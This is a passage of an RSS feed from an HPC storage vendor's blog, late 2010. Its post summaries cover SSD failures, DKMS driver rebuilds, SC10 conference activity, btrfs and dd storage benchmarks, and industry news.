      <pubDate>Sat, 04 Dec 2010 16:13:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/are-expectations-being-set-properly/</guid>
      <description>This past week, I looked over a set of proposals from some academic groups. One of these proposals was attempting to budget for a particular design. What I noticed here was a tendency to do something &amp;hellip; well &amp;hellip; that badly misstates actual real costs of things, and substitutes them with something easy to find without any regard for the actual real costs of implementing the service. At the end of the day, IT is about providing processing, storage, and data interchange in the service of a task that can make effective use of the resources.</description>
    </item>
    
    <item>
      <title>dust shaping up nicely</title>
      <link>https://blog.scalability.org/2010/12/dust-shaping-up-nicely/</link>
      <pubDate>Sat, 04 Dec 2010 15:52:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/dust-shaping-up-nicely/</guid>
      <description>Hooking in some execution management bits. Most everything else is working. I could skip the fancy execution management, and just fork, but I want to be able to do a better job of logging and capturing output/signals. More to the point, with the bits I&amp;rsquo;ve got in place now, dust should be able to do the builds in parallel (everyone say &amp;ldquo;ooh&amp;rdquo; now). The only impediment to this could be RPM if you use it here.</description>
    </item>
    
    <item>
      <title>... and the hits keep on coming ...</title>
      <link>https://blog.scalability.org/2010/12/and-the-hits-keep-on-coming/</link>
      <pubDate>Fri, 03 Dec 2010 18:22:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/and-the-hits-keep-on-coming/</guid>
      <description>Our documentation site is based upon wiki software from Mindtouch. I&amp;rsquo;ve liked their interface, it isn&amp;rsquo;t bad at all. It allows us to tier our content access, which is very important for our support models. In an effort to keep the site up to date, I did a
yum -y update  and it went through and updated. Including the wiki. Unfortunately, the new software has some terminal breakage. So, until we can unwind the breakage (or reform the site), the site will be down.</description>
    </item>
    
    <item>
      <title>Disappointment on a Friday</title>
      <link>https://blog.scalability.org/2010/12/disappointment-on-a-friday/</link>
      <pubDate>Fri, 03 Dec 2010 13:47:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/disappointment-on-a-friday/</guid>
      <description>We work very hard for our customers. We take lots of lumps for our suppliers. Its our boxen, so if their stuff occasionally fails in our boxen &amp;hellip; well its obviously our fault. Right? I am not disclaiming responsibility &amp;hellip; we take ownership of every problem. So now imagine you are a customer, and you have a vendor who sends you (proactively) multiple sets of replacement SSDs. Walks you through the process of swapout.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2010-12-03</title>
      <link>https://blog.scalability.org/2010/12/twitter-updates-for-2010-12-03/</link>
      <pubDate>Fri, 03 Dec 2010 11:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/twitter-updates-for-2010-12-03/</guid>
      <description>* Strange personality traits: for some reason, I like listening to techno stuff while coding, and death/thrash metal while quoting ... hmmm [#](http://twitter.com/sijoe/statuses/10477947920060417) * Just read the arsenic bits. Now only if we can get gallium involved, my dissertation could have ... er ... applicability to something ... [#](http://twitter.com/sijoe/statuses/10478276933844993)  Powered by Twitter Tools</description>
    </item>
    
    <item>
      <title>The beginnings of dust ...</title>
      <link>https://blog.scalability.org/2010/12/the-beginnings-of-dust/</link>
      <pubDate>Thu, 02 Dec 2010 05:15:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/the-beginnings-of-dust/</guid>
      <description>So, as you might have seen from previous posts &amp;hellip; I couldn&amp;rsquo;t fix what was broke in DKMS. We have some customers that insist upon the functionality, and we can&amp;rsquo;t fix the tool. So, rather than trying to force them to rerun our driver update scripts, we are automating the process. The idea is to make the whole process as easy as possible. Most of the management bits are done, the build bits come tomorrow.</description>
    </item>
    
    <item>
      <title>a plea for sanity in driver module versioning</title>
      <link>https://blog.scalability.org/2010/12/a-plea-for-sanity-in-driver-module-versioning/</link>
      <pubDate>Thu, 02 Dec 2010 04:52:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/a-plea-for-sanity-in-driver-module-versioning/</guid>
      <description>Imagine you are working on a tool to figure out some driver module bits. Now imagine you need to parse driver version info bits. Imagine, much to your chagrin, you discover that &amp;hellip; well &amp;hellip; there is nothing close to a standard nomenclature. Imagine your horror thinking about all those hours you wasted on the clever &amp;ndash;sanity switch which would sanity check what you have against whats in there. Now imagine being grumpy about this.</description>
    </item>
    
    <item>
      <title>SC10 video is up</title>
      <link>https://blog.scalability.org/2010/12/sc10-video-is-up/</link>
      <pubDate>Wed, 01 Dec 2010 13:36:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/sc10-video-is-up/</guid>
      <description>At InsideHPC, you can see me at the end of Wednesday night, trying to string words together sitting next to Rich Brueckner. Video turned out good. The laptop is my box (dude, I got a Dell!), and the little white thingy on the right with the blinking LED is the network connection. SC10 is a great place for supercomputing, and a terrible place for wifi. I find this curious &amp;hellip; that we HPC types can&amp;rsquo;t seem to stand up wifi that scales to 14k people &amp;hellip; :) The siCluster-NAS demo was done remotely (this is a good model for SC &amp;hellip; making me think &amp;hellip;).</description>
    </item>
    
    <item>
      <title>I&#39;ve come to the conclusion that DKMS is broke</title>
      <link>https://blog.scalability.org/2010/11/ive-come-to-the-conclusion-that-dkms-is-broke/</link>
      <pubDate>Tue, 30 Nov 2010 22:03:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/ive-come-to-the-conclusion-that-dkms-is-broke/</guid>
      <description>After installing DKMS enabled drivers, and watching them not rebuild correctly on an update. At this point I think its worth replacing DKMS with something that does work.</description>
    </item>
    
    <item>
      <title>Seeing strong demand for large memory systems</title>
      <link>https://blog.scalability.org/2010/11/seeing-strong-demand-for-large-memory-systems/</link>
      <pubDate>Sun, 28 Nov 2010 14:45:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/seeing-strong-demand-for-large-memory-systems/</guid>
      <description>We have multiple customers asking for systems with Intel Xeon 3+ GHz cores and 512+ GB of ram. Not just in financial services, but in engineering (NVH and other computing). Interesting development, and its nice to see this interest. It doesn&amp;rsquo;t hurt these large computing systems to have huge pipes to IO as well. This is a welcome development for us.</description>
    </item>
    
    <item>
      <title>OT: the theater keeps getting more absurd</title>
      <link>https://blog.scalability.org/2010/11/ot-the-theater-keeps-getting-more-absurd/</link>
      <pubDate>Wed, 24 Nov 2010 13:42:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/ot-the-theater-keeps-getting-more-absurd/</guid>
      <description>Like many other things today, this is a comedic horror show. Its god aweful, but you just can&amp;rsquo;t stop watching, and shaking your head. Apparently 70+% of US citizens want Israeli style airport security &amp;hellip; which &amp;hellip; curiously &amp;hellip; works well. What we get instead is this. Scanning someone &amp;hellip; who is entering the country, after having flown into the country? Really? What &amp;hellip; they might bring nail clippers in and pollute our hotel rooms with dropped clippings?</description>
    </item>
    
    <item>
      <title>Power outage at day job</title>
      <link>https://blog.scalability.org/2010/11/power-outage-at-day-job-2/</link>
      <pubDate>Tue, 23 Nov 2010 16:32:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/power-outage-at-day-job-2/</guid>
      <description>Running the main server on the generator (UPS connected). Gotta love DTE. Was down this morning, came back, of course lots of work to get done. Then we heard a big bang. Lights flickered and went down. Oddly, one of our circuits is live. The rest aren&amp;rsquo;t but one is. Found it as the coffemaker light was on. Sheesh. Will probably set up a backup site on the same machine that runs this site.</description>
    </item>
    
    <item>
      <title>Interesting reading on SSD reliability</title>
      <link>https://blog.scalability.org/2010/11/interesting-reading-on-ssd-reliability/</link>
      <pubDate>Tue, 23 Nov 2010 06:32:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/interesting-reading-on-ssd-reliability/</guid>
      <description>Been researching this more. The questions I am asking now are, are the MTBF numbers believable? Are their bad batches of NAND chips &amp;hellip; SLC, MLC? What failure rates do people see with SLC? We have seen failures in both SLC and MLC units. MLC is generally indicated to be less reliable than SLC.
I am specifically looking for failure information. What I am finding is concerning me. Generally, among all controller chips out there, there seem to be a number of people reporting sudden failures in 2-3 month windows.</description>
    </item>
    
    <item>
      <title>More M&amp;A:  Novell sold itself to Attachmate</title>
      <link>https://blog.scalability.org/2010/11/more-ma-novell-sold-itself-to-attachmate/</link>
      <pubDate>Tue, 23 Nov 2010 04:56:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/more-ma-novell-sold-itself-to-attachmate/</guid>
      <description>This is interesting. This is a new line of business for Attachmate, they aren&amp;rsquo;t in OSes, NOS, and other things directly related to this. I don&amp;rsquo;t quite understand the rationale behind the acquisition. I need to look at that one more. Best guess is that Attachmate is really a holding company with a loose connection of holdings, with not significant overlap. In conjunction with this, Novell sold 882 patents to Microsoft.</description>
    </item>
    
    <item>
      <title>Expectations set incorrectly?</title>
      <link>https://blog.scalability.org/2010/11/expectations-set-incorrectly/</link>
      <pubDate>Tue, 23 Nov 2010 03:23:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/expectations-set-incorrectly/</guid>
      <description>So I wonder if we should be thinking that SSDs shouldn&amp;rsquo;t fail as often as spinning disk. That is, SSDs don&amp;rsquo;t have moving parts, and so are much less subject to mechanical wear and tear as they are used. But they do fail. Every brand of SSDs we have used, every one, including Intel, Corsair, RiData, Mushkin &amp;hellip; every one, we have seen failures. Some have been absolutely ridiculous in scope (Corsair), some have been mostly due to changes in their mechanical design (RiData) as well as unit failures.</description>
    </item>
    
    <item>
      <title>Wrasslin with DKMS</title>
      <link>https://blog.scalability.org/2010/11/wrasslin-with-dkms/</link>
      <pubDate>Mon, 22 Nov 2010 16:26:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/wrasslin-with-dkms/</guid>
      <description>Turns out Centos isn&amp;rsquo;t quite exactly equivalent to Redhat, as far as DKMS goes. Don&amp;rsquo;t ask me why, I am having a hard time figuring it out right now. We are trying to not re-invent a wheel and use the Dell developed DKMS system. We want driver rebuilds to trigger on kernel updates when needed. But &amp;hellip; while it works correctly with a simple dkms.conf on Centos 5.5, the same thing doesn&amp;rsquo;t seem to work on RHEL 5.</description>
    </item>
    
    <item>
      <title>siCluster-NAS was announced at SC10 ... but ...</title>
      <link>https://blog.scalability.org/2010/11/sicluster-nas-was-announced-at-sc10-but/</link>
      <pubDate>Sat, 20 Nov 2010 20:36:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/sicluster-nas-was-announced-at-sc10-but/</guid>
      <description>[updated] Its up on InsideHPC, and showing up on the PR sites now. One of these days I&amp;rsquo;m gonna learn to do this stuff earlier &amp;hellip; &amp;hellip; looks like it didn&amp;rsquo;t make it out some of the PR and news sites (I submitted it late to InsideHPC, and Rich Brueckner was positively inundated with bits, so its possible it may show up later). So the PR is here, and we&amp;rsquo;ll have the reseller/contact list up shortly.</description>
    </item>
    
    <item>
      <title>OT:  theater of the absurd</title>
      <link>https://blog.scalability.org/2010/11/ot-theater-of-the-absurd/</link>
      <pubDate>Sat, 20 Nov 2010 20:16:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/ot-theater-of-the-absurd/</guid>
      <description>[update after the fold] Having just been through travel to SC10, and been put through the body scanner, the metal scanner, but thankfully no pat downs, I did see some of the more &amp;hellip; aggressive &amp;hellip; inspections in the beginning phases. Bruce Schneier has a long post on this, including many many links.
I am not sure I want my family to go through this. I am not happy with it, and to be frank, I remain unconvinced that this is better than the null hypothesis, that is, not doing these invasive searches.</description>
    </item>
    
    <item>
      <title>Mergers and Acquisitions:  Isilon eaten by EMC</title>
      <link>https://blog.scalability.org/2010/11/mergers-and-acquisitions-isilon-eaten-by-emc/</link>
      <pubDate>Sat, 20 Nov 2010 16:27:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/mergers-and-acquisitions-isilon-eaten-by-emc/</guid>
      <description>Yes, its old news now &amp;hellip; announced Tuesday morning, and this is Saturday. Isilon, a maker of scale out NAS units (which hadn&amp;rsquo;t been spectactularly profitable &amp;hellip; they had some issues in the recent past) has growing business in Bio-IT and other areas. They are a player in HPC storage for clusters. EMC hasn&amp;rsquo;t really been a player in HPC for a while. In the past, some groups have tried to use EMC as the storage provider for HPC, but the economics and performance aren&amp;rsquo;t a good fit for most of their product line.</description>
    </item>
    
    <item>
      <title>A fork in the Lustre road?</title>
      <link>https://blog.scalability.org/2010/11/a-fork-in-the-lustre-road/</link>
      <pubDate>Sat, 20 Nov 2010 16:01:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/a-fork-in-the-lustre-road/</guid>
      <description>I&amp;rsquo;ve been waiting a while to post this, to see how things develop. Lustre does indeed have a future. The question is, will Oracle cede control over Lustre, or will it be forked by OpenSFS/WhamCloud/Xyratec ? A few short months ago, its future was cloudy at best. Oracle isn&amp;rsquo;t seemingly interested in HPC, except where it matters for the database side of things. So most things HPC specific (with little possible alternative use cases) have been given the heave-ho.</description>
    </item>
    
    <item>
      <title>On the state of Microsoft&#39;s HPC effort</title>
      <link>https://blog.scalability.org/2010/11/on-the-state-of-microsofts-hpc-effort/</link>
      <pubDate>Fri, 19 Nov 2010 18:59:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/on-the-state-of-microsofts-hpc-effort/</guid>
      <description>Reports were in that a Windows based system was able to crack the 1PF barrier, but that the same system running Linux, was faster. Cudos to Microsoft for this &amp;hellip; but I have to ask &amp;hellip; really &amp;hellip; if this statement from Bill Hilf is true:
then why is Microsoft competing in the stratospheric regime of performance if its not trying to be there? I see a fundamental disconnect between actions and words.</description>
    </item>
    
    <item>
      <title>Semi-OT: When the engine of the economy sputters ...</title>
      <link>https://blog.scalability.org/2010/11/semi-ot-when-the-engine-of-the-economy-sputters/</link>
      <pubDate>Fri, 19 Nov 2010 14:44:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/semi-ot-when-the-engine-of-the-economy-sputters/</guid>
      <description>Sort of like Ayn Rand&amp;rsquo;s excellent Atlas Shrugged, when eventually enough barriers to building companies and forming wealth occur, they will stop trying. See the WSJ article about this. This impacts HPC, as smaller folks with good products, and awesome future products now see enough uncertainty that many are hedging their bets. Which means not taking as many risks. Or hiring as many people. Funny how that economy thing works. Jobs are created when entrepreneurs take risks that result in capital formation.</description>
    </item>
    
    <item>
      <title>SC10 wrap up podcast</title>
      <link>https://blog.scalability.org/2010/11/sc10-wrap-up-pod-cast/</link>
      <pubDate>Thu, 18 Nov 2010 04:30:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/sc10-wrap-up-pod-cast/</guid>
      <description>I&amp;rsquo;ve been behind on podcast viewing. Way behind. So today I was Rich Brueckner&amp;rsquo;s sidekick (queue sidekick music) on the InsideSC10 Recap. Link above takes you to the site, please do click it, as InsideHPC is in part supported by advertising revenue (scalability.org is a self funded effort). Video is also on Youtube, and you can see it here:
Yes, I did almost say &amp;ldquo;develop that technology&amp;rdquo; when talking about people.</description>
    </item>
    
    <item>
      <title>SC10: the wind down</title>
      <link>https://blog.scalability.org/2010/11/sc10-the-wind-down/</link>
      <pubDate>Thu, 18 Nov 2010 02:36:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/sc10-the-wind-down/</guid>
      <description>The conference is winding down. Tuesday was good, Wednesday was wild. Non-stop. I didn&amp;rsquo;t have a free moment. This was a good show. We got the siCluster-NAS formally launched (for less than $1000/usable TB with scalable bandwidth, we think it is pretty good). We got some nice financial services demos up running on the siCluster-NAS. We didn&amp;rsquo;t spend too much money to setup and run the demos. Tomorrow, Green-HPC gets announced (and I think Top500).</description>
    </item>
    
    <item>
      <title>siCluster and JackRabbit benchmark report slightly delayed</title>
      <link>https://blog.scalability.org/2010/11/sicluster-and-jackrabbit-benchmark-report-slightly-delayed/</link>
      <pubDate>Tue, 16 Nov 2010 13:30:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/sicluster-and-jackrabbit-benchmark-report-slightly-delayed/</guid>
      <description>My bad, we&amp;rsquo;ve been very busy. I had expected to have them done by show time, and of course, I haven&amp;rsquo;t had time. We have all the data, I have to sit down with it, finish crunching it, and put it into our document. It will be done soon. Then we&amp;rsquo;ll post it on our web site and you can pull it down. siCluster benchmark report will have (older) results from a GlusterFS set of tests.</description>
    </item>
    
    <item>
      <title>SC10 day T&#43;1: first full day of conference</title>
      <link>https://blog.scalability.org/2010/11/sc10-day-t1-first-full-day-of-conference/</link>
      <pubDate>Tue, 16 Nov 2010 13:22:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/sc10-day-t1-first-full-day-of-conference/</guid>
      <description>Starting this post in the morning. I&amp;rsquo;d like to see us get some traffic going to the booth #4517 right next to the Ethernet Alliance booth. So how can we generate traffic &amp;hellip; sorry no extraordinarily attractive obviously non-geek humans there &amp;hellip; well, there&amp;rsquo;s product interest (we are announcing siCluster-NAS this morning), there&amp;rsquo;s swag (courtesy of Intel), and some Scalable Informatics pens. How about a quid pro quo. Come by and engage with us, and we&amp;rsquo;ll reciprocate.</description>
    </item>
    
    <item>
      <title>SC10 day 0: The beowulf bash, and bacon wrapped servers</title>
      <link>https://blog.scalability.org/2010/11/sc10-day-0-the-beowulf-bash-and-bacon-wrapped-servers/</link>
      <pubDate>Tue, 16 Nov 2010 13:11:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/sc10-day-0-the-beowulf-bash-and-bacon-wrapped-servers/</guid>
      <description>Doug says, &amp;ldquo;hey Joe, lets drive, so we don&amp;rsquo;t get soaked, and have better control over our leaving time.&amp;rdquo; Which makes sense. So into the GPS went the name, out came a set of directions, which we followed. The thing about GPSes &amp;hellip; well &amp;hellip; the data can tell you about where things are, from a driving perspective. But having signs up helps. Otherwise, you wind up walking in what amounted to a semicircle for 15 minutes in a blowing rain, and getting the uncovered sections of your clothes innundated with water.</description>
    </item>
    
    <item>
      <title>SC10 day T-0:  the gala begins</title>
      <link>https://blog.scalability.org/2010/11/sc10-day-t-0-the-gala-begins/</link>
      <pubDate>Tue, 16 Nov 2010 01:09:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/sc10-day-t-0-the-gala-begins/</guid>
      <description>We are in booth 4517-ish, right by the Ethernet Alliance in the Intel Channel Partner booth. Come by and say hello! We have a nice quick Kdb+ demo, and will be talking about our siCluster-NAS scale out NAS product.</description>
    </item>
    
    <item>
      <title>SC10 day T-1: the arrival</title>
      <link>https://blog.scalability.org/2010/11/sc10-day-t-1-the-arrival/</link>
      <pubDate>Sun, 14 Nov 2010 23:53:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/sc10-day-t-1-the-arrival/</guid>
      <description>We got in this morning. Security was &amp;hellip; er &amp;hellip; security. I feel like the TSA should buy me a nice dinner. And maybe call sometime (feeble attempt at humor on my part). One gets the feeling that they are actively discouraging air travel. Got in to the McKendrick-Breaux house, a nice B&amp;amp;B; very close to the convention center, and costing a similar amount to hotels there. Nice location, very close.</description>
    </item>
    
    <item>
      <title>SC10 day T-2:  The preparations</title>
      <link>https://blog.scalability.org/2010/11/sc10-day-t-2-the-preparations/</link>
      <pubDate>Sat, 13 Nov 2010 16:44:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/sc10-day-t-2-the-preparations/</guid>
      <description>We are going to be there, in the Intel Channel Partner Pavilion (will find booth number and post it) on Monday and Tuesday. We have lots of work to do &amp;hellip; and its Saturday. First, we have to finish up the siCluster-NAS bits. Expect PR on Monday (will send it to InsideHPC and try to get it into the SC10 PR stream). Need to finish web page and handouts for it.</description>
    </item>
    
    <item>
      <title>On value</title>
      <link>https://blog.scalability.org/2010/11/on-value/</link>
      <pubDate>Fri, 12 Nov 2010 03:24:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/on-value/</guid>
      <description>What precisely is it people buy &amp;hellip; is it a box full of parts they assemble themselves, or a service, or a turnkey solution? What they buy comes fundamentally from where they believe value to be. The buyer of boxes full of parts have value pegged to inverse of price. The lower the price the higher the value. The buyer of a service or a solution is looking for a specific set of expectations to be met.</description>
    </item>
    
    <item>
      <title>Amusing PR</title>
      <link>https://blog.scalability.org/2010/11/amusing-pr/</link>
      <pubDate>Fri, 12 Nov 2010 03:10:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/amusing-pr/</guid>
      <description>Every now and then we see people declare themselves to be the king of the hill in performance or in some other metric of relevance. Then come the theoretical max numbers or their measurements. As a reminder, our single JR4 units are sustaining 2.3+ GB/s to and from disk for TB sized files, and have QDR IB type connections (as well as 10GbE and GbE) available. Lots of bandwidth per box.</description>
    </item>
    
    <item>
      <title>What a set of weeks ... wow</title>
      <link>https://blog.scalability.org/2010/11/what-a-set-of-weeks-wow/</link>
      <pubDate>Fri, 12 Nov 2010 03:01:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/what-a-set-of-weeks-wow/</guid>
      <description>We delivered our first siCluster-NAS unit to a government customer. Built it and delivered it. In 8 days. From parts. Just got back this afternoon. SC10 coming up, and we will be there. Intel Partner Pavilion, Monday and Tuesday. Up to meet with people on Wednesday/Thursday, so ping me if you&amp;rsquo;d like to get together.</description>
    </item>
    
    <item>
      <title>One of them days ...</title>
      <link>https://blog.scalability.org/2010/11/one-of-them-days/</link>
      <pubDate>Thu, 04 Nov 2010 20:30:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/one-of-them-days/</guid>
      <description>Ever have a day like this: Me: You need the wheels on the car to be able to drive it off the lot Them: Nonesense. They cost extra. We don&amp;rsquo;t need them. (hours/days/weeks/months later) Them: How come you didn&amp;rsquo;t tell us we need wheels? All I can think to do is to blink rapidly without saying anything.</description>
    </item>
    
    <item>
      <title>User load well above 10</title>
      <link>https://blog.scalability.org/2010/11/user-load-well-above-10/</link>
      <pubDate>Thu, 04 Nov 2010 14:52:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/user-load-well-above-10/</guid>
      <description>this is why I haven&amp;rsquo;t been doing any posting &amp;hellip; preparing for SC10, building a new siCluster-NAS (scale out NAS unit) for a government customer, dealing with shipping units to Chile, new orders for other units &amp;hellip;, meeting with partners and prospective partners, generating quotes like mad &amp;hellip; Yeah &amp;hellip; busy &amp;hellip; :)</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2010-11-03</title>
      <link>https://blog.scalability.org/2010/11/twitter-updates-for-2010-11-03/</link>
      <pubDate>Wed, 03 Nov 2010 11:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/twitter-updates-for-2010-11-03/</guid>
      <description>* Is #[twitter](http://search.twitter.com/search?q=%23twitter) broke? I keep getting &amp;quot;internal server errors&amp;quot; [#](http://twitter.com/sijoe/statuses/29523254356) * Congrats @[RickForMI](http://twitter.com/RickForMI) ... early call, but it looks like you are the new governor of the state of Michigan [#](http://twitter.com/sijoe/statuses/29523344742)  Powered by Twitter Tools</description>
    </item>
    
    <item>
      <title>OT: Its rare that I see an economic analysis so spot on ...</title>
      <link>https://blog.scalability.org/2010/11/ot-its-rare-that-i-see-an-economic-analysis-so-spot-on/</link>
      <pubDate>Mon, 01 Nov 2010 16:13:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/ot-its-rare-that-i-see-an-economic-analysis-so-spot-on/</guid>
      <description>трапезни масиSaw this, this morning. There was news over the past few weeks of tax avoidance strategies by Google and others. Criticism appears to have been muted at the political level, where they are avid funders of elected official&amp;rsquo;s re-election bids. Go figure. But this article points out some of the real details behind the headlines, and talks about job creation in general. Something that #RickForMI is likely painfully aware of (assuming he wins governor race tomorrow).</description>
    </item>
    
    <item>
      <title>BTRFS is effectively stable</title>
      <link>https://blog.scalability.org/2010/10/btrfs-is-effectively-stable/</link>
      <pubDate>Fri, 29 Oct 2010 16:39:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/10/btrfs-is-effectively-stable/</guid>
      <description>Yeah, I know, the web page says its under heavy development. And its on disk format can change. And its mailing list is chock full of patches. But it passed our stability test. 100 iterations (3.2TB written/read in all and compared to checksums) of the following fio test case.
[global] size=8g iodepth=32 blocksize=1m numjobs=4 nrfiles=1 ioengine=vsync rw=write [sw1] create_serialize=0 create_on_open=1 #directory=/data directory=/mnt/btrfs verify=crc32c-intel verify_async=8 group_reporting  This is our baseline test.</description>
    </item>
    
    <item>
      <title>Current &#34;fastest&#34; supercomputer is ... APU powered !</title>
      <link>https://blog.scalability.org/2010/10/current-fastest-supercomputer-is-apu-powered/</link>
      <pubDate>Thu, 28 Oct 2010 14:33:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/10/current-fastest-supercomputer-is-apu-powered/</guid>
      <description>Go figure. Between 6 and 3 years ago, when we were pitching HPC accelerators to VCs, trying to convince them that it was inevitable that supercomputing was going this route, we (optimistically) predicted that the worlds fastest machine would be Accelerator Processing Unit (APU) based in 2012. Well, we were wrong. November 2010 is the correct answer. My expectation is that many HPC systems (probably most) will have some sort of APU technology (GPUs, vector extensions, Larabee like things, Tilera like things).</description>
    </item>
    
    <item>
      <title>Running some btrfs (vs xfs) tests on 2.6.36</title>
      <link>https://blog.scalability.org/2010/10/running-some-btrfs-vs-xfs-tests-on-2-6-36/</link>
      <pubDate>Tue, 26 Oct 2010 20:29:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/10/running-some-btrfs-vs-xfs-tests-on-2-6-36/</guid>
      <description>Interesting results thus far, but not quite what I expected. Doing our acid test (reading and writing 8 threads of 8GB each for 64GB per read/write test, 100 times, with crc checking turned on). If btrfs doesn&amp;rsquo;t crash the kernel, and doesn&amp;rsquo;t start tossing CRC errors, yeah, its safe to use then (though we will throw the real octobonnie and hexadecabonnie loads at it).</description>
    </item>
    
    <item>
      <title>again ... seriously busy ...</title>
      <link>https://blog.scalability.org/2010/10/again-seriously-busy/</link>
      <pubDate>Mon, 25 Oct 2010 00:06:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/10/again-seriously-busy/</guid>
      <description>SC10 prep, machine builds/tests, quotes, yadda yadda &amp;hellip; Will have a number of posts up soon, in the next few days.</description>
    </item>
    
    <item>
      <title>Half open drivers ... OFED stacks with verbs ABIs that don&#39;t match the kernel&#39;s verb ABI ...</title>
      <link>https://blog.scalability.org/2010/10/half-open-drivers-ofed-stacks-with-verbs-abis-that-dont-match-the-kernels-verb-abi/</link>
      <pubDate>Thu, 14 Oct 2010 03:27:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/10/half-open-drivers-ofed-stacks-with-verbs-abis-that-dont-match-the-kernels-verb-abi/</guid>
      <description>I just ran through another update exercise. IB cards, OFED stack. GlusterFS atop this. Cards are well known vendors cards. They work pretty well. But &amp;hellip; only with very specific kernels. Other kernels need not apply. Our 2.6.32.22 kernel is pretty darned fast (so our customers tell us). Now lets build the OFED 1.5.2 &amp;hellip; and see what happens &amp;hellip;
To make a long story short, we wound up abandoning that approach.</description>
    </item>
    
    <item>
      <title>2 ... no 3! new resellers in the past week</title>
      <link>https://blog.scalability.org/2010/10/2-no-3-new-resellers-in-the-past-week/</link>
      <pubDate>Thu, 14 Oct 2010 03:14:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/10/2-no-3-new-resellers-in-the-past-week/</guid>
      <description>Been a very busy beaver, even with a broken finger. We now have 3 new resellers. We&amp;rsquo;ll have this info up on a page soon at the day job. One very well known group in edu/research, another helped us get our first NOAA sale, and another is headed up by a former colleague from SGI/Cray days. Very exciting times!</description>
    </item>
    
    <item>
      <title>How cool is this ...</title>
      <link>https://blog.scalability.org/2010/10/how-cool-is-this/</link>
      <pubDate>Thu, 07 Oct 2010 20:46:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/10/how-cool-is-this/</guid>
      <description>Customers machine went down. They have a spare (buy them in pairs). Needed us to look at it. Set their unit up to boot from a virtual CD over the IPMI port. ?Pointed that virtual CD at a bootserver we had built in a VM. Poked some holes in the firewall. And voila. The machine about 1400 miles away is up and booted, using the bootserver, and we are looking into the failure (looks to be temperature related &amp;hellip; go figure) Yeah, it was a little slow, but thats fine for the moment.</description>
    </item>
    
    <item>
      <title>Interesting customer feedback</title>
      <link>https://blog.scalability.org/2010/10/interesting-customer-feedback/</link>
      <pubDate>Thu, 07 Oct 2010 00:19:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/10/interesting-customer-feedback/</guid>
      <description>One little single chassis JR4 apparently is a bit faster, at being a NAS, than a 6 shelf product from [some other scale out NAS vendor, a rather well known one]. This vendor is currently the rage in NGS circles. We know we are fast. We knew the other folks weren&amp;rsquo;t so fast. I am &amp;hellip; I guess &amp;hellip; not surprised &amp;hellip; to hear this. There are benchmarks. And then there is the real world.</description>
    </item>
    
    <item>
      <title>Raw, uncompromising, unapologetic ... firepower</title>
      <link>https://blog.scalability.org/2010/10/raw-uncompromising-unapologetic-firepower/</link>
      <pubDate>Thu, 07 Oct 2010 00:06:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/10/raw-uncompromising-unapologetic-firepower/</guid>
      <description>Latest Scalable Informatics high performance JR4 test runs &amp;hellip; untuned. I should say, imagine a rack full of 10 of these, with a functional IB QDR fabric behind them. Makes for a nice 23 GB/s (best case) per rack cluster file system platform.
[root@localhost ~]# dd if=/dev/zero of=/data/big.file ... 2450+0 records in 2450+0 records out 82208358400 bytes (82 GB) copied, 36.4844 seconds, 2.3 GB/s [root@localhost ~]# dd of=/dev/null if=/data/big.file ... 2450+0 records in 2450+0 records out 82208358400 bytes (82 GB) copied, 37.</description>
    </item>
    
    <item>
      <title>Our friends at Pervasive Software, showing Smith Waterman results</title>
      <link>https://blog.scalability.org/2010/10/our-friends-at-pervasive-software-showing-smith-waterman-results/</link>
      <pubDate>Fri, 01 Oct 2010 14:06:34 +0000</pubDate>
      
